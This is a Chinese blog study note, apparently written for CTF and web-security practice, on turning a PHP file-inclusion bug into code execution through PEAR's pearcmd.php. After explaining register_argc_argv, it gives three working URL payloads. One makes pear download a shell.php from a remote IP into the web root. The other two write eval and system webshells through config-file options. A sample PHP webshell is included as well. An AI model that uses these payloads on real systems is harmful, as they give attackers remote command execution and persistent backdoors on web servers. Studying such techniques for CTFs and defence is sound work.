pear文件包含学习记录

最新推荐文章于 2024-05-22 18:36:50 发布
最新推荐文章于 2024-05-22 18:36:50 发布
阅读量730 收藏 4
点赞数
分类专栏: Web安全学习篇 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/124005355
版权

中文全称PHP扩展应用库

php go-pear.php即可安装,没有就先要去官网下 go-pear.php

一般都是装在/usr/local/lib/php/pearcmd.php

然后就是要在php.ini处找到这个给打开register_argc_argv=ON,默认也是开启的

下面就可以愉快的测试了

正文

开启register_argc_argv 有什么用处?开启了之后$_SERVER[‘argv’]就开始生效了

<?php
var_dump($_SERVER);
?>

  ["argv"]=>
  array(0) {
  }
  ["argc"]=>
  int(0)
不加任何参数得到的argv数组是空,现在加上再试
http://127.0.0.1/1.php?aaa+bbb+ccc
  array(3) {
    [0]=>
    string(3) "aaa"
    [1]=>
    string(3) "bbb"
    [2]=>
    string(3) "ccc"
  }
  ["argc"]=>
  int(3)
可以看见argv是有值的了

再来看pearcmd.php这个文件,往下跟进
在这里插入图片描述在这里插入图片描述
进入到这个factory工厂中,会去找XML是否存在,一个命令对应一个XML,所以命令是有限可控,
在这里插入图片描述
在这里插入图片描述

然后来到这个函数的三个判断,前两个显然是无法满足的,因为版本啥的不可控

    function &fromXmlString($data, $state, $file, $archive = false)
    {
        if (preg_match('/<package[^>]+version="([0-9]+\.[0-9]+)"/', $data, $packageversion)) {
            .........
            
            return $pf;
        } elseif (preg_match('/<package[^>]+version="([^"]+)"/', $data, $packageversion)) {
           ..........
           
            return $a;
        } else {
		   ..........
		  
            return $pf;
        }

可用姿势

1、下载远程文件
?file=/usr/local/lib/php/pearcmd.php&aaa+install+-R+/var/www/html/+http://远程ip/shell.php

<?php
echo "<?php system(\$_POST[1]);";

注意这里我用的是echo,而不是直接的shell,是因为这个过程是先读取文件的内容,然后再写入
/var/www/html/tmp/pear/download/shell.php

2、写入配置文件到/tmp/shell.php
?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?php eval($_POST[1]);?>+-s+

3、日志配置文件写马到目录
?file=/usr/local/lib/php/pearcmd.php&aaa+config-create+/var/www/html/<?=`$_POST[1]`;?>+1.php
paidx0
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
pear-core:这是PEAR核心文件的权威来源
05-04
PEAR-PEAR安装程序 什么是PEAR安装程序? 什么是梨? PEAR是可在找到PHP扩展和应用程序存储库。 PEAR Installer是此软件,其中包含可执行文件和PHP代码,这些代码用于从pear.php.net下载和安装PEAR代码。 PEAR包含有用的软件库和应用程序,例如MDB2(数据库抽象),HTML_QuickForm(HTML表单管理),PhpDocumentor(自动文档生成器),DB_DataObject(数据访问抽象)等等。 浏览位于所有可用软件包,此列表在不断增长和更新,以反映PHP语言的改进。 警告 不要在未安装PEAR的情况下运行它-如果您手动下载了这个tarball,则必须安装它。 使用前,请阅读INSTALL中的说明。 文献资料 可以在找到有关PEAR的文档。 可以在此tarball中包含的INSTALL文件中找到安装文档。 测验 无需安装即可
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
Jay17的博客
07-26 813
pear文件利用 (远程文件下载、生成配置文件、写配置文件) 从一道题看——CTFshow私教 web40
CTFshow元旦水友赛-web-easy include
最新发布
jwkaaaaaa的博客
05-22 422
CTF元旦水友赛-web-easy include wp
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1309
是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
CTF中的pearcmd.php文件包含
qq_52988816的博客
09-27 970
还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。
pearcmd文件包含漏洞
Elite的博客
01-20 1479
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
PHP核心教程 php pear php pear
07-27
3. **类库**:包括网络、数据库、文件处理、日期时间等多个领域的类库,如DB(数据库抽象层)、Mail(邮件处理)、XML_RPC(远程过程调用)等。 4. **编码规范**:PEAR也制定了统一的编码风格和命名规则,有助于...
pear_manual_en.rar_PEAR Manu_pear_manual_en_pear_manual_en.chm_p
09-23
通过遵循这些API,开发者可以访问并使用PEAR提供的各种服务,例如数据库操作、文件处理、错误处理和日志记录等。理解并熟练使用PEAR API对于高效开发是至关重要的。 **实例分析** 在"pear_manual_en.chm"文件中,...
Pear-Admin-Fast-master.zip
01-14
"Pear-Admin-Fast-master.zip" 是一个包含了一个名为 "Pear-Admin-Fast-master" 的项目的压缩文件。这个项目是一个快速开发平台,尤其注重界面美观性。从描述中我们可以了解到,该平台在原有的基础上进行了一些调整...
Pear Admin Think 基 于 thinkphp6 的 管 理 系 统
11-04
Pear Admin Think:基于ThinkPHP6的高效后台管理系统详解》 在现代Web应用开发中,后台管理系统扮演着至关重要的角色,它为开发者提供了一个统一、便捷的管理平台,以高效地进行数据操作和业务处理。而Pear Admin...
pear用户手册英文版
08-26
8. **错误处理和日志记录**:PEAR提供了一套统一的错误处理机制和日志记录工具,使得应用程序的错误报告和调试更加规范和高效。 9. **版本控制**:PEAR使用版本控制系统(如Git)来管理和追踪组件的更新,用户可以...
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5754
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2493
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3487
浅谈一下文件包含之包含pearcmd.php漏洞
pearcmd.php文件包含,相关CTF例题
m0_63716101的博客
11-27 1100
pear的默认安装路径为/usr/local/lib/php/pear.php,在命令行中可以使用pear和/usr/local/lib/php/pear.php运行,如果存在文件包含漏洞,则可以直接运行此命令,下面我们介绍一下register_argc_argv选项,如果此选项打开,则此时用户输入的内容。file后面是pearcmd的默认路径,因为Index.php提示了后面会加php,所以直接/usr/local/lib/php/pearcmd就好了。但他最后会在file后面加个.php,题目提示了。
利用pearcmd.php从LFI到getshell
feng的博客
10-29 5111
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
LFI TO RCE之pearcmd.php的妙用
Aiwin的博客
10-10 2387
LFI TO RCE之pearcmd.php的妙用及NewStarCTF IncludeTwo例题
pear库的安装及使用
qq_29815027的博客
03-26 1798
pear是PHP的扩展和应用程序库,包含了很多有用的类,安装好php5.0后,pear实际上并没有被安装,安装的方法如下:  1.在php目录中双击go-pear.bat。  2.按照提示输入一些设置信息,主要是要把局域网的网关加上,如http://192.168.0.1:80/ ,pear要用这个地址访问Internet,若无代理服务器则直接回车  3.然后会提示一些包和PHP绑定,选择Y
PEAR LOG日志系统
afeiqiang的专栏
01-15 2471
在健壮的软件体系里面,日志扮演着十分重要的角色。日志系统设计的好坏,直接影响到软件运行的可靠性。PEAR的LOG是一个小巧实用的日志系统,可以将日志记录到文件、数据库、系统日志,或输出到控制台。 简单的例子 include 'Log.php'; $log = Log::singleton("file" , HOME_DIR.'/var/logs/feedbowl.log');
pear文件包含漏洞
07-27
对于PEAR文件包含漏洞,可以采取以下措施来解决: 1. 更新PEAR库:确保您使用的是最新版本的PEAR库,因为旧版本可能存在已知的漏洞。可以通过使用PEAR自带的命令或者手动下载最新版本来更新。 2. 确认安全性补丁:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值